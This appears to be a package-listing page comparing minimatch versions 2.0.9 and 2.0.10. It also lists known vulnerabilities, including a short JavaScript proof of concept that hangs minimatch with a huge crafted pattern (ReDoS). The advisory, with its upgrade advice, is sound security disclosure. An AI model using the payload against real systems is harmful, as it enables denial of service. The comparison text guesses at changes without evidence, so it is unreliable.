Minimatch is a popular JavaScript library used for glob matching, a technique for specifying sets of filenames with wildcard characters. Versions 2.0.9 and 2.0.10 of the library share the same core functionality, providing robust glob pattern matching for file system operations, data processing, and other tasks where flexible file selection is needed. Both versions depend on the brace-expansion package for handling brace expansion syntax within glob patterns, and they share the same development dependencies like tap for testing, standard for code style enforcement, and browserify for browser compatibility. They are both released under the ISC license and authored by Isaac Z. Schlueter.
The key difference lies in the release date. Version 2.0.10 was released on July 23, 2015, several days after version 2.0.9 released on July 18, 2015. This suggests that version 2.0.10 likely contains bug fixes, performance improvements, or minor updates implemented after the previous version. While the nature of these changes isn't explicit in the provided data, upgrading from 2.0.9 to 2.0.10 is generally recommended for developers to benefit from these improvements and ensure they are using the most stable and up-to-date version of the library.
For developers using Minimatch, note that the library consistently provides efficient and flexible glob matching capabilities. The library uses the same repository URL for both versions.
All the vulnerabilities related to the version 2.0.10 of the package
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.